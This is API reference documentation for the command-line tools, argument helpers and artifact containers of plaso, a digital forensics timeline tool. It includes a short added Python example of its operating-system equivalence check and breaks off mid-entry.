Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Text prepend command line arguments.'
NAME = 'text_prepend'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
plaso.cli.helpers.timesketch_output module
The Timesketch output module CLI arguments helper.
class plaso.cli.helpers.timesketch_output.TimesketchOutputArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Timesketch output module CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'output'
DESCRIPTION = 'Argument helper for the timesketch output module.'
NAME = 'timesketch'
classmethod ParseOptions(options, output_module)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• output_module (TimesketchOutputModule) – output module to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.vfs_backend module
The VFS back-end CLI arguments helper.
class plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
VFS back-end CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'dfVFS back-end command line arguments.'
NAME = 'vfs_backend'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
plaso.cli.helpers.viper_analysis module
The Viper analysis plugin CLI arguments helper.
class plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Viper analysis plugin CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'analysis'
DESCRIPTION = 'Argument helper for the Viper analysis plugin.'
NAME = 'viper'
classmethod ParseOptions(options, analysis_plugin)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• analysis_plugin (ViperAnalysisPlugin) – analysis plugin to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when unable to connect to Viper instance.
plaso.cli.helpers.virustotal_analysis module
The VirusTotal analysis plugin CLI arguments helper.
class plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
VirusTotal analysis plugin CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'analysis'
DESCRIPTION = 'Argument helper for the VirusTotal analysis plugin.'
NAME = 'virustotal'
classmethod ParseOptions(options, analysis_plugin)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• analysis_plugin (VirusTotalAnalysisPlugin) – analysis plugin to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation or when unable to connect to VirusTotal.
plaso.cli.helpers.windows_services_analysis module
The Windows Services analysis plugin CLI arguments helper.
class plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Windows Services analysis plugin CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'analysis'
DESCRIPTION = 'Argument helper for the Windows Services analysis plugin.'
NAME = 'windows_services'
classmethod ParseOptions(options, analysis_plugin)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• analysis_plugin (WindowsServicePlugin) – analysis plugin to configure.
Raises BadConfigObject – when the output module object is of the wrong type.
plaso.cli.helpers.workers module
The worker processes CLI arguments helper.
class plaso.cli.helpers.workers.WorkersArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Worker processes CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Worker processes command line arguments.'
NAME = 'workers'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.xlsx_output module
The XLSX output module CLI arguments helper.
class plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
XLSX output module CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'output'
DESCRIPTION = 'Argument helper for the XLSX output module.'
NAME = 'xlsx'
classmethod ParseOptions(options, output_module)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• output_module (XLSXOutputModule) – output module to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when the output filename was not provided.
plaso.cli.helpers.yara_rules module
The YARA rules CLI arguments helper.
class plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
YARA rules CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'YARA rules command line arguments.'
NAME = 'yara_rules'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
Module contents
This file imports Python modules that register CLI helpers.
Submodules
plaso.cli.extraction_tool module
The extraction CLI tool.
class plaso.cli.extraction_tool.ExtractionTool(input_reader=None, output_writer=None)
Bases: plaso.cli.storage_media_tool.StorageMediaTool, plaso.cli.tool_options.HashersOptions, plaso.cli.tool_options.ProfilingOptions, plaso.cli.tool_options.StorageFileOptions
Extraction CLI tool.
list_time_zones
True if the time zones should be listed.
Type bool
AddPerformanceOptions(argument_group)
Adds the performance options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AddProcessingOptions(argument_group)
Adds the processing options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AddTimeZoneOption(argument_group)
Adds the time zone option to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
ListParsersAndPlugins()
Lists information about the available parsers and plugins.
plaso.cli.image_export_tool module
The image export CLI tool.
class plaso.cli.image_export_tool.ImageExportTool(input_reader=None, output_writer=None)
Bases: plaso.cli.storage_media_tool.StorageMediaTool
Class that implements the image export CLI tool.
has_filters
True if filters have been specified via the options.
Type bool
list_signature_identifiers
True if information about the signature identifiers should be shown.
Type bool
AddFilterOptions(argument_group)
Adds the filter options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
DESCRIPTION = 'This is a simple collector designed to export files inside an image, both within a regular RAW image as well as inside a VSS. The tool uses a collection filter that uses the same syntax as a targeted plaso filter.'
EPILOG = 'And that is how you export files, plaso style.'
ListSignatureIdentifiers()
Lists the signature identifier.
Raises BadConfigOption – if the data location is invalid.
NAME = 'image_export'
ParseArguments(arguments)
Parses the command line arguments.
Parameters arguments (list[str]) – command line arguments.
Returns True if the arguments were successfully parsed.
Return type bool
ParseOptions(options)
Parses the options and initializes the front-end.
Parameters options (argparse.Namespace) – command line arguments.
Raises BadConfigOption – if the options are invalid.
PrintFilterCollection()
Prints the filter collection.
ProcessSources()
Processes the sources.
Raises
• SourceScannerError – if the source scanner could not find a supported file system.
• UserAbort – if the user initiated an abort.
plaso.cli.log2timeline_tool module
The log2timeline CLI tool.
class plaso.cli.log2timeline_tool.Log2TimelineTool(input_reader=None, output_writer=None)
Bases: plaso.cli.extraction_tool.ExtractionTool
Log2timeline CLI tool.
dependencies_check
True if the availability and versions of dependencies should be checked.
Type bool
list_hashers
True if the hashers should be listed.
Type bool
list_parsers_and_plugins
True if the parsers and plugins should be listed.
Type bool
list_profilers
True if the profilers should be listed.
Type bool
show_info
True if information about hashers, parsers, plugins, etc. should be shown.
Type bool
DESCRIPTION = '\nlog2timeline is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n'
EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n log2timeline.py /cases/mycase/storage.plaso ímynd.dd\n\nInstead of answering questions, indicate some of the options on the\ncommand line (including data from particular VSS stores).\n log2timeline.py --vss_stores 1,2 /cases/plaso_vss.plaso image.E01\n\nAnd that is how you build a timeline using log2timeline...\n'
ExtractEventsFromSources()
Processes the sources and extracts events.
Raises
• BadConfigOption – if the storage file path is invalid or the storage format not supported or an invalid collection filter was specified.
• SourceScannerError – if the source scanner could not find a supported file system.
• UserAbort – if the user initiated an abort.
NAME = 'log2timeline'
ParseArguments(arguments)
Parses the command line arguments.
Parameters arguments (list[str]) – command line arguments.
Returns True if the arguments were successfully parsed.
Return type bool
ParseOptions(options)
Parses the options.
Parameters options (argparse.Namespace) – command line arguments.
Raises BadConfigOption – if the options are invalid.
ShowInfo()
Shows information about available hashers, parsers, plugins, etc.
plaso.cli.logger module
The cli sub module logger.
plaso.cli.pinfo_tool module
The pinfo CLI tool.
class plaso.cli.pinfo_tool.PinfoTool(input_reader=None, output_writer=None)
Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.StorageFileOptions
Pinfo CLI tool.
compare_storage_information
True if the tool is used to compare stores.
Type bool
list_sections
True if the sections should be listed.
Type bool
CompareStores()
Compares the contents of two stores.
Returns True if the content of the stores is identical.
Return type bool
DESCRIPTION = 'Shows information about a Plaso storage file, for example how it was collected, what information was extracted from a source, etc.'
ListSections()
Lists information about the available sections.
NAME = 'pinfo'
ParseArguments(arguments)
Parses the command line arguments.
Parameters arguments (list[str]) – command line arguments.
Returns True if the arguments were successfully parsed.
Return type bool
ParseOptions(options)
Parses the options.
Parameters options (argparse.Namespace) – command line arguments.
Raises BadConfigOption – if the options are invalid.
PrintStorageInformation()
Prints the storage information.
plaso.cli.psort_tool module
The psort CLI tool.
class plaso.cli.psort_tool.PsortTool(input_reader=None, output_writer=None)
Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.AnalysisPluginOptions, plaso.cli.tool_options.FormattersOptions, plaso.cli.tool_options.OutputModuleOptions, plaso.cli.tool_options.ProfilingOptions, plaso.cli.tool_options.StorageFileOptions
Psort CLI tool.
list_analysis_plugins
True if information about the analysis plugins should be shown.
Type bool
list_language_identifiers
True if information about the language identifiers should be shown.
Type bool
list_output_modules
True if information about the output modules should be shown.
Type bool
list_profilers
True if the profilers should be listed.
Type bool
list_time_zones
True if the time zones should be listed.
Type bool
AddOutputTimeZoneOption(argument_group)
Adds the output time zone option to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AddProcessingOptions(argument_group)
Adds processing options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
DESCRIPTION = 'Application to read, filter and process output from a plaso storage file.'
NAME = 'psort'
ParseArguments(arguments)
Parses the command line arguments.
Parameters arguments (list[str]) – command line arguments.
Returns True if the arguments were successfully parsed.
Return type bool
ParseOptions(options)
Parses the options.
Parameters options (argparse.Namespace) – command line arguments.
Raises BadConfigOption – if the options are invalid.
ProcessStorage()
Processes a plaso storage file.
Raises
• BadConfigOption – when a configuration parameter fails validation or the storage file cannot be opened with read access.
• RuntimeError – if a non-recoverable situation is encountered.
plaso.cli.psteal_tool module
The psteal CLI tool.
class plaso.cli.psteal_tool.PstealTool(input_reader=None, output_writer=None)
Bases: plaso.cli.extraction_tool.ExtractionTool, plaso.cli.tool_options.FormattersOptions, plaso.cli.tool_options.HashersOptions, plaso.cli.tool_options.OutputModuleOptions, plaso.cli.tool_options.StorageFileOptions
Psteal CLI tool.
Psteal extracts events from the provided source and stores them in an intermediate storage file. After extraction an output log file is created. This mimics the behavior of log2timeline.pl.
The tool currently doesn’t support any of the log2timeline or psort tools’ flags.
dependencies_check
True if the availability and versions of dependencies should be checked.
Type bool
list_hashers
True if the hashers should be listed.
Type bool
list_language_identifiers
True if information about the language identifiers should be shown.
Type bool
list_output_modules
True if information about the output modules should be shown.
Type bool
list_parsers_and_plugins
True if the parsers and plugins should be listed.
Type bool
AddOutputTimeZoneOption(argument_group)
Adds the output time zone option to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AnalyzeEvents()
Analyzes events from a plaso storage file and generates a report.
Raises
• BadConfigOption – when a configuration parameter fails validation or the storage file cannot be opened with read access.
• RuntimeError – if a non-recoverable situation is encountered.
DESCRIPTION = '\npsteal is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device. The output events will be stored in a storage file.\nThis tool will then read the output and process the events into a CSV \nfile.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n'
EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n psteal.py --source ímynd.dd -w imynd.timeline.txt\n\nAnd that is how you build a timeline using psteal...\n'
ExtractEventsFromSources()
Processes the sources and extracts events.
This is a stripped down copy of tools/log2timeline.py that doesn’t support the full set of flags. The defaults for these are hard coded in the constructor of this class.
Raises
• BadConfigOption – if the storage file path is invalid or the storage format not supported or an invalid collection filter was specified.
• SourceScannerError – if the source scanner could not find a supported file system.
• UserAbort – if the user initiated an abort.
NAME = 'psteal'
ParseArguments(arguments)
Parses the command line arguments.
Parameters arguments (list[str]) – command line arguments.
Returns True if the arguments were successfully parsed.
Return type bool
ParseOptions(options)
Parses tool specific options.
Parameters options (argparse.Namespace) – command line arguments.
Raises BadConfigOption – if the options are invalid.
plaso.cli.status_view module
The status view.
class plaso.cli.status_view.StatusView(output_writer, tool_name)
Bases: object
Processing status view.
GetAnalysisStatusUpdateCallback()
Retrieves the analysis status update callback function.
Returns status update callback function or None if not available.
Return type function
GetExtractionStatusUpdateCallback()
Retrieves the extraction status update callback function.
Returns status update callback function or None if not available.
Return type function
MODE_LINEAR = 'linear'
MODE_WINDOW = 'window'
PrintExtractionStatusHeader(processing_status)
Prints the extraction status header.
Parameters processing_status (ProcessingStatus) – processing status.
PrintExtractionSummary(processing_status)
Prints a summary of the extraction.
Parameters processing_status (ProcessingStatus) – processing status.
SetMode(mode)
Sets the mode.
Parameters mode (str) – status view mode.
SetSourceInformation(source_path, source_type, artifact_filters=None, filter_file=None)
Sets the source information.
Parameters
• source_path (str) – path of the source.
• source_type (str) – source type.
• artifact_filters (Optional[list[str]]) – names of artifact definitions to use as filters.
• filter_file (Optional[str]) – filter file.
SetStorageFileInformation(storage_file_path)
Sets the storage file information.
Parameters storage_file_path (str) – path to the storage file.
plaso.cli.storage_media_tool module
The storage media CLI tool.
class plaso.cli.storage_media_tool.StorageMediaTool(input_reader=None, output_writer=None)
Bases: plaso.cli.tools.CLITool
CLI tool that supports a storage media device or image as input.
AddCredentialOptions(argument_group)
Adds the credential options to the argument group.
The credential options are used to unlock encrypted volumes.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AddStorageMediaImageOptions(argument_group)
Adds the storage media image options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AddVSSProcessingOptions(argument_group)
Adds the VSS processing options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
ScanSource(source_path)
Scans the source path for volume and file systems.
This function sets the internal source path specification and source type values.
Parameters source_path (str) – path to the source.
Returns source scanner context.
Return type dfvfs.SourceScannerContext
Raises SourceScannerError – if the format of or within the source is not supported.
plaso.cli.time_slices module
The time slice.
class plaso.cli.time_slices.TimeSlice(event_timestamp, duration=5)
Bases: object
Time slice.
The time slice is used to provide a context of events around an event of interest.
duration
duration of the time slice in minutes.
Type int
event_timestamp
event timestamp of the time slice or None.
Type int
property end_timestamp
slice end timestamp or None.
Type int
property start_timestamp
slice start timestamp or None.
Type int
plaso.cli.tool_options module
The CLI tool options mix-ins.
class plaso.cli.tool_options.AnalysisPluginOptions
Bases: object
Analysis plugin options mix-in.
ListAnalysisPlugins()
Lists the analysis modules.
class plaso.cli.tool_options.FormattersOptions
Bases: object
Formatters options mix-in.
class plaso.cli.tool_options.HashersOptions
Bases: object
Hashers options mix-in.
ListHashers()
Lists information about the available hashers.
class plaso.cli.tool_options.OutputModuleOptions
Bases: object
Output module options mix-in.
ListLanguageIdentifiers()
Lists the language identifiers.
ListOutputModules()
Lists the output modules.
class plaso.cli.tool_options.ProfilingOptions
Bases: object
Profiling options mix-in.
ListProfilers()
Lists information about the available profilers.
class plaso.cli.tool_options.StorageFileOptions
Bases: object
Storage file options mix-in.
plaso.cli.tools module
The command line interface (CLI) tools classes.
class plaso.cli.tools.CLIInputReader(encoding='utf-8')
Bases: object
Command line interface input reader interface.
abstract Read()
Reads a string from the input.
Returns input.
Return type str
class plaso.cli.tools.CLIOutputWriter(encoding='utf-8')
Bases: object
Command line interface output writer interface.
abstract Write(string)
Writes a string to the output.
Parameters string (str) – output.
class plaso.cli.tools.CLITool(input_reader=None, output_writer=None)
Bases: object
Command line interface tool.
preferred_encoding
preferred encoding of single-byte or multi-byte character strings, sometimes referred to as extended ASCII.
Type str
show_troubleshooting
True if troubleshooting information should be shown.
Type bool
AddBasicOptions(argument_group)
Adds the basic options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AddInformationalOptions(argument_group)
Adds the informational options to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
AddLogFileOptions(argument_group)
Adds the log file option to the argument group.
Parameters argument_group (argparse._ArgumentGroup) – argparse argument group.
CheckOutDated()
Checks if the version of plaso is outdated and warns the user.
GetCommandLineArguments()
Retrieves the command line arguments.
Returns command line arguments.
Return type str
GetVersionInformation()
Retrieves the version information.
Returns version information.
Return type str
ListTimeZones()
Lists the timezones.
NAME = ''
ParseNumericOption(options, name, base=10, default_value=None)
Parses a numeric option.
If the option is not set the default value is returned.
Parameters
• options (argparse.Namespace) – command line arguments.
• name (str) – name of the numeric option.
• base (Optional[int]) – base of the numeric value.
• default_value (Optional[object]) – default value.
Returns numeric value.
Return type int
Raises BadConfigOption – if the options are invalid.
ParseStringOption(options, argument_name, default_value=None)
Parses a string command line argument.
Parameters
• options (argparse.Namespace) – command line arguments.
• argument_name (str) – name of the command line argument.
• default_value (Optional[object]) – default value of the command line argument.
Returns
command line argument value. If the command line argument is not set the default value will be returned.
Return type object
Raises BadConfigOption – if the command line argument value cannot be converted to a Unicode string.
PrintSeparatorLine()
Prints a separator line.
class plaso.cli.tools.FileObjectInputReader(file_object, encoding='utf-8')
Bases: plaso.cli.tools.CLIInputReader
File object command line interface input reader.
This input reader relies on the file-like object having a readline method.
Read()
Reads a string from the input.
Returns input.
Return type str
class plaso.cli.tools.FileObjectOutputWriter(file_object, encoding='utf-8')
Bases: plaso.cli.tools.CLIOutputWriter
File object command line interface output writer.
This output writer relies on the file-like object having a write method.
Write(string)
Writes a string to the output.
Parameters string (str) – output.
class plaso.cli.tools.StdinInputReader(encoding='utf-8')
Bases: plaso.cli.tools.FileObjectInputReader
Stdin command line interface input reader.
Read()
Reads a string from the input.
Returns input.
Return type str
class plaso.cli.tools.StdoutOutputWriter(encoding='utf-8')
Bases: plaso.cli.tools.FileObjectOutputWriter
Stdout command line interface output writer.
Write(string)
Writes a string to the output.
Parameters string (str) – output.
plaso.cli.views module
View classes.
class plaso.cli.views.BaseTableView(column_names=None, title=None)
Bases: object
Table view interface.
AddRow(values)
Adds a row of values.
Parameters values (list[object]) – values.
Raises ValueError – if the number of values is out of bounds.
abstract Write(output_writer)
Writes the table to the output writer.
Parameters output_writer (OutputWriter) – output writer.
class plaso.cli.views.CLITableView(column_names=None, title=None)
Bases: plaso.cli.views.BaseTableView
Command line table view.
Note that currently this table view does not support more than 2 columns.
AddRow(values)
Adds a row of values.
Parameters values (list[object]) – values.
Raises ValueError – if the number of values is out of bounds.
Write(output_writer)
Writes the table to the output writer.
Parameters output_writer (OutputWriter) – output writer.
Raises RuntimeError – if the title exceeds the maximum width or if the table has more than 2 columns or if the column width is out of bounds.
class plaso.cli.views.CLITabularTableView(column_names=None, column_sizes=None, title=None)
Bases: plaso.cli.views.BaseTableView
Command line tabular table view interface.
AddRow(values)
Adds a row of values.
Parameters values (list[object]) – values.
Raises ValueError – if the number of values is out of bounds.
Write(output_writer)
Writes the table to the output writer.
Parameters output_writer (OutputWriter) – output writer.
class plaso.cli.views.MarkdownTableView(column_names=None, title=None)
Bases: plaso.cli.views.BaseTableView
Markdown table view.
Write(output_writer)
Writes the table to the output writer.
Parameters output_writer (OutputWriter) – output writer.
class plaso.cli.views.ViewsFactory
Bases: object
Views factory.
FORMAT_TYPE_CLI = 'cli'
FORMAT_TYPE_MARKDOWN = 'markdown'
classmethod GetTableView(format_type, column_names=None, title=None)
Retrieves a table view.
Parameters
• format_type (str) – table view format type.
• column_names (Optional[list[str]]) – column names.
• title (Optional[str]) – title.
Returns table view.
Return type BaseTableView
Raises ValueError – if the format type is not supported.
Module contents
5.1.4 plaso.containers package
Submodules
plaso.containers.analyzer_result module
Analyzer result attribute container.
class plaso.containers.analyzer_result.AnalyzerResult
Bases: plaso.containers.interface.AttributeContainer
Attribute container to store results of analyzers.
Analyzers can produce results with different attribute names. For example, the ‘hashing’ analyzer could produce an attribute ‘md5_hash’, with a value of ‘d41d8cd98f00b204e9800998ecf8427e’.
analyzer_name
name of the analyzer that produced the result.
Type str
attribute_name
name of the attribute produced.
Type str
attribute_value
value of the attribute produced.
Type str
CONTAINER_TYPE = 'analyzer_result'
plaso.containers.artifacts module
Artifact attribute containers.
class plaso.containers.artifacts.ArtifactAttributeContainer
Bases: plaso.containers.interface.AttributeContainer
Base class to represent an artifact attribute container.
class plaso.containers.artifacts.EnvironmentVariableArtifact(case_sensitive=True, name=None, value=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Environment variable artifact attribute container.
Also see: https://en.wikipedia.org/wiki/Environment_variable
case_sensitive
True if environment variable name is case sensitive.
Type bool
name
environment variable name such as “SystemRoot” as in “%SystemRoot%” or “HOME” as in “$HOME”.
Type str
value
environment variable value such as “C:\Windows” or “/home/user”.
Type str
CONTAINER_TYPE = 'environment_variable'
class plaso.containers.artifacts.HostnameArtifact(name=None, schema='DNS')
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Hostname artifact attribute container.
Also see: https://en.wikipedia.org/wiki/Hostname Cybox / Stix Hostname Object
name
name of the host according to the naming schema.
Type str
schema
naming schema such as “DNS”, “NIS”, “SMB/NetBIOS”.
Type str
CONTAINER_TYPE = 'hostname'
class plaso.containers.artifacts.OperatingSystemArtifact(family=None, product=None, version=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Operating system artifact attribute container.
family
operating system family name, such as “Linux”, “MacOS” or “Windows”, defined in definitions.OPERATING_SYSTEM_FAMILIES. This value is used to programmatically link a parser preset to an operating system and therefore must be one of the predefined values.
Type str
name
operating system name, such as “macOS Mojave” or “Windows XP”. This value is used to programmatically link a parser preset to an operating system and therefore must be one of the predefined values.
Type str
product
product information, such as “macOS Mojave” or “Windows Professional XP”. This value is typically obtained from the source data.
Type str
version
version, such as “10.14.1” or “5.1”. This value is typically obtained from the source data.
Type str
CONTAINER_TYPE = 'operating_system'
IsEquivalent(other)
Determines if 2 operating system artifacts are equivalent.
This function compares the operating systems based on, in order:
• name derived from product
• family and version
• family
Parameters other (OperatingSystemArtifact) – operating system artifact attribute container to compare with.
Returns
True if the operating systems are considered equivalent, False if the most specific criteria do not match, or no criteria are available.
Return type bool
property version_tuple
version tuple or None if version is not set or invalid.
Type tuple[int]
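The comparison order IsEquivalent documents, as an added illustration that is not plaso's own code: a predefined name is derived from the product string, with fall-back to family plus version and then to family alone. The product-to-name table and the version parsing are assumptions made for this example, standing in for plaso's definitions module.

```python
# Added illustrative re-implementation of the OperatingSystemArtifact
# equivalence rules; not plaso's own code.
from typing import Optional, Tuple

# Constructed lookup (stands in for plaso's predefined operating system
# names): product string prefix -> predefined operating system name.
_PRODUCT_TO_NAME = {
    'macOS Mojave': 'macOS Mojave',
    'Windows Professional XP': 'Windows XP',
    'Windows XP': 'Windows XP',
}


class OperatingSystemArtifact:
    """Operating system artifact with the documented equivalence rules."""

    CONTAINER_TYPE = 'operating_system'

    def __init__(self, family=None, product=None, version=None):
        self.family = family      # e.g. "Windows", one of the predefined families
        self.product = product    # free text from the source, e.g. "Windows Professional XP"
        self.version = version    # free text from the source, e.g. "5.1"

    @property
    def name(self) -> Optional[str]:
        """Predefined operating system name derived from product, or None."""
        if not self.product:
            return None
        for prefix, name in _PRODUCT_TO_NAME.items():
            if self.product.startswith(prefix):
                return name
        return None

    @property
    def version_tuple(self) -> Optional[Tuple[int, ...]]:
        """Version as a tuple of ints, or None if not set or not numeric."""
        if not self.version:
            return None
        try:
            return tuple(int(part) for part in self.version.split('.'))
        except ValueError:
            return None

    def IsEquivalent(self, other: 'OperatingSystemArtifact') -> bool:
        """Compares on the most specific criterion available on both sides.

        Order: name derived from product, then family and version, then
        family. Returns False when that criterion does not match or when no
        criterion is available on both sides.
        """
        if self.name and other.name:
            return self.name == other.name
        if (self.family and other.family and
                self.version_tuple and other.version_tuple):
            return (self.family == other.family and
                    self.version_tuple == other.version_tuple)
        if self.family and other.family:
            return self.family == other.family
        return False
```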
class plaso.containers.artifacts.SourceConfigurationArtifact(path_spec=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Source configuration artifact attribute container.
The source configuration contains the configuration data of a source that is (or going to be) processed, such as a volume in a storage media image or a mounted directory.
mount_path
path of a “mounted” directory input source.
Type str
path_spec
path specification of the source that is processed.
Type dfvfs.PathSpec
system_configuration
system configuration of a specific system installation, such as Windows or Linux, detected by the pre-processing on the source.
Type SystemConfigurationArtifact
CONTAINER_TYPE = 'source_configuration'
class plaso.containers.artifacts.SystemConfigurationArtifact(code_page=None, time_zone=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
System configuration artifact attribute container.
The system configuration contains the configuration data of a specific system installation such as Windows or Linux.
available_time_zones
available time zones.
Type list[TimeZone]
code_page
system code page.
Type str
hostname
hostname.
Type HostnameArtifact
keyboard_layout
keyboard layout.
Type str
operating_system
operating system, for example “MacOS” or “Windows”.
Type str
operating_system_product
operating system product, for example “Windows XP”.
Type str
operating_system_version
operating system version, for example “10.9.2” or “8.1”.
Type str
time_zone
system time zone.
Type str
user_accounts
user accounts.
Type list[UserAccountArtifact]
CONTAINER_TYPE = 'system_configuration'
class plaso.containers.artifacts.TimeZoneArtifact(name=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Time zone artifact attribute container.
name
name describing the time zone, for example Greenwich Standard Time.
Type str
CONTAINER_TYPE = 'time_zone'
class plaso.containers.artifacts.UserAccountArtifact(full_name=None, group_identifier=None, identifier=None, path_separator='/', user_directory=None, username=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
User account artifact attribute container.
Also see: Cybox / Stix User Account Object
full_name
name describing the user.
Type str
group_identifier
identifier of the primary group the user is part of.
Type str
identifier
user identifier.
Type str
user_directory
path of the user (or home or profile) directory.
Type str
username
name uniquely identifying the user.
Type str
CONTAINER_TYPE = 'user_account'
GetUserDirectoryPathSegments()
Retrieves the path segments of the user directory.
Returns
path segments of the user directory or an empty list if no user directory is set.
Return type list[str]
plaso.containers.event_sources module
Event source attribute containers.
class plaso.containers.event_sources.EventSource(path_spec=None)
Bases: plaso.containers.interface.AttributeContainer
Event source attribute container.
The event source object contains information about where a specific event originates, e.g. a file, the $STANDARD_INFORMATION MFT attribute, or the Application Compatibility cache.
data_type
attribute container type indicator.
Type str
file_entry_type
dfVFS file entry type.
Type str
path_spec
path specification.
Type dfvfs.PathSpec
CONTAINER_TYPE = 'event_source'
DATA_TYPE = None
__lt__(other)
Compares if the event source attribute container is less than the other.
Parameters other (EventSource) – event source attribute container to compare to.
Returns True if the event source attribute container is less than the other.
Return type bool
class plaso.containers.event_sources.FileEntryEventSource(path_spec=None)
Bases: plaso.containers.event_sources.EventSource
File entry event source.
The file entry event source is an event source that represents a file within a file system.
DATA_TYPE = 'file_entry'
plaso.containers.events module
Event attribute containers.
class plaso.containers.events.EventData(data_type=None)
Bases: plaso.containers.interface.AttributeContainer
Event data attribute container.
The event data attribute container represents the attributes of an entity, such as a database record or log line.
data_type
event data type indicator.
Type str
offset
offset relative to the start of the data stream where the event data is stored.
Type int
parser
